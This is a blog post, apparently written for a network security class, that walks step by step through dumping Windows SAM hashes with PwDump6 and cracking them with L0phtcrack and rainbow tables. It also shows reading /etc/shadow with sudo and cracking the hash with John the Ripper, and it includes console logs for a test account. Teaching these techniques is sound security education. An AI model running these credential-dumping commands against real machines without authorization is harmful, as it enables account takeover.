Cracking Local Passwords
For a Network Security Class we were asked to prepare a brief document describing techniques used to crack both Windows LM hashes and Linux Shadow Hashes.
Though covered to death elsewhere I figured I might post it here anyway, just for kicks.
Enjoy!
PART ONE – PREPARATION
Required Tools:
Several tools are required before one can successfully crack local machine passwords for Linux or the Windows operating systems. In order of appearance we will be using PwDump6-1.5.0, L0phtcrack 5, Project Rainbow crack’s rtgen.exe, rtsort.exe, & rcrack.exe. For the Linux tools we will be using cat, grep, and John the Ripper.
On the Windows machine that possesses the target account you are required to place PwDump6. For our target Linux machine you must install cat, grep, and John the Ripper. Most Linux distributions will ship with cat and grep preinstalled, leaving only John the Ripper for you to install.
Administrator access is required on the Windows box to ensure proper permission to inject the LSASS service and obtain access to the SAM file. For the Linux box: root, or wheel group access is required in order to gain access to the shadow password file.
PART TWO – WINDOWS PASSWORDS
Retrieving Hashes:
To begin we must obtain the hashes of the target accounts that we wish to crack. In order to do this we will use the Pwdump utility. On a windows machine, passwords are hashed and store within a protected system file known as the SAM file. This SAM file is accessible only to system level processes, thus making it inaccessible for even our administrative level access.
In order to gain access to this system level file, PwDump uses a technique known as DLL injection to place its own executable code and resources within the address space of a known system level process (in this case the LSASS process). Once it has gained the system level access it then is able to use undocumented windows API calls to extract the password hashes from the SAM file.
Steps to follow:
Open a Windows shell and navigate to the directory you installed PwDump6.
- Run the pwdump.exe with the argument 127.0.0.1 (this specifies to run a dump against the local machine).
pwdump.exe 127.0.0.1 - Ensure that the hashes for the account you are targeting are shown.
- If this is the case, run the same command again, but with the output piped to a text file.
pwdump.exe 127.0.0.1 > C:\hashes.txt - Copy the hashes.txt file from the target machine to your cracking machine.
Cracking with L0phtcrack:
Start L0phtcrack and close the wizard that appears.
- Choose “Create a new LC5 Session” from the toolbar.
- Next click the “Session” menu item and choose “import”.
- Click “import from a PwDump file”.
- Click the browse button and provide it with the hashes.txt file you obtained from the target machine.
- Next ensure that your password hashes were loading into L0phtcrack with the correct account present.
- Finally, click the “Begin Audit” button.
- When complete, obtain the decrypted password hash.
Cracking with a Time/Memory Trade Off
Time/Memory trade off is a relatively new password cracking technique which makes a trade between less cracking time and greater consumed memory.
It works by spending time pre-computing every possible hash within a keyspace (i.e. all alphanumeric characters, or all alphanumeric characters plus punctuation). It then stores these hashes along with their plain text value in an easy to search database-like format. Then when you require a hash to be cracked you can perform a search based on the hash and find the corresponding plain text value you used to initially computer the DB row.
Computing a large keyset rainbow table for the LM hash algorithm would no doubt take a great deal of time and effort initially, but luckily for us the Shmoo-group provides several LM hash rainbow tables via Bit Torrent.
Thus with a pre-computed rainbow table from the Shmoo-group we are able to crack passwords of a much more complicated nature saving a great deal of time; all at the cost of a few gigabytes of cheap storage.
Steps to follow:
Obtain a rainbow table for your desired keyspace from http://rainbowtables.shmoo.com/ using your favourite Bit Torrent client.
- Extract the rainbow tables and run the Project Rainbowcrack’s rtsort.exe as follows.
rtsort lm_alpha#1-7_0_2100x8000000_all.rtWhere “lm_alpha….” is the name of the first rainbow table file Run this command on each file until all are sorted - Next, take the pwdump output file hashes.txt you created on the victim machine and run the rcrack utility against it as follows:
rcrack *.rt –f hashes.txtDo this when you are in the same directory as your pwdump file and the extracted, sorted, rainbow tables - Copy the resulting plaintext.
PART THREE – LINUX PASSWORDS
Retrieving Hashes:
Passwords on a Linux machine were once stored in a world readable file called /etc/passwd. In this day and age, however, most modern Linux distributions now enable “shadowed passwords”, which when turned on move the actual password hashes to a root controlled file /etc/shadow.
Unlike a windows machine, specialized tools are not required to extract the hashes from this shadow file. Instead we only require root access and some rudimentary shell commands to filter our results to just the account we desire.
Steps to follow:
If required, elevate your privileges to that of the root account by means of su.
- With root privileges, access the /etc/shadow file and filter your target account’s hash into a file within a directory under your control:
sudo cat /etc/shadow | grep dummy > /home/Daniel/dummy_shadow.txt - If required, transfer the dummy_shadow.txt hash file from the target machine to your cracking machine.
Cracking with John the Ripper:
Instruct John the Ripper to perform an incremental (brute force) attack on your copied password hash:
-
john –incremental /home/Daniel/dummy_shadow.txt - When the password has been cracked, copy down the output from the following command:
john –show /home/Daniel/dummy_shadow.txt
APPENDICES
Appendix A – Windows Console Log(s):
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\enduser>cd C:\pwdump6-1.5.0\pwdump6\PwDumpDebug
C:\pwdump6-1.5.0\pwdump6\PwDumpDebug>pwdump.exe 127.0.0.1
pwdump6 Version 1.5.0-BETA by fizzgig and the mighty group at foofus.net
- THIS IS A BETA VERSION! YOU HAVE BEEN WARNED. **
Copyright 2006 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
Using pipe {F1C04D50-1165-4614-A2B7-BC6B6906C755}
Key length is 16
Administrator:500:NO PASSWORD*********************:NO PASSWORD******************
***:::
DummyAccount:1006:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B75
86C:::
Completed.
Appendix 2 – Linux Console Log(s)
daniel@McCarneyPC:~$ sudo cat /etc/shadow | grep dummy
dummy:$1$kongSlLw$dRDJ15w612hqhaAWN1vM20:13657:0:99999:7:::
daniel@McCarneyPC:~$ sudo cat /etc/shadow | grep dummy >> /home/daniel/dummy_shadow.txt
daniel@McCarneyPC:~$
daniel@McCarneyPC:~$ john -incremental dummy_shadow.txt
Loaded 1 password (FreeBSD MD5 [32/64])
guesses: 0 time: 0:00:00:17 c/s: 4577 trying: 14811
guesses: 0 time: 0:00:00:22 c/s: 4653 trying: edj
guesses: 0 time: 0:00:00:24 c/s: 4607 trying: sarknete
guesses: 0 time: 0:00:00:25 c/s: 4750 trying: hut
guesses: 0 time: 0:00:00:27 c/s: 4702 trying: cook
guesses: 0 time: 0:00:00:29 c/s: 4660 trying: statese
guesses: 0 time: 0:00:00:31 c/s: 4623 trying: murety2
guesses: 0 time: 0:00:00:32 c/s: 4735 trying: clobly5
guesses: 0 time: 0:00:00:34 c/s: 4697 trying: crUADS
password (dummy)
guesses: 1 time: 0:00:00:54 c/s: 4700 trying: password
daniel@McCarneyPC:~$
daniel@McCarneyPC:~$ john -show dummy_shadow.txt
dummy:password:13657:0:99999:7:::
1 password cracked, 0 left
daniel@McCarneyPC:~$
Appendix 3 – Reference URL’s
Transmissions:
← Powershell Backup Script Deflash Script →
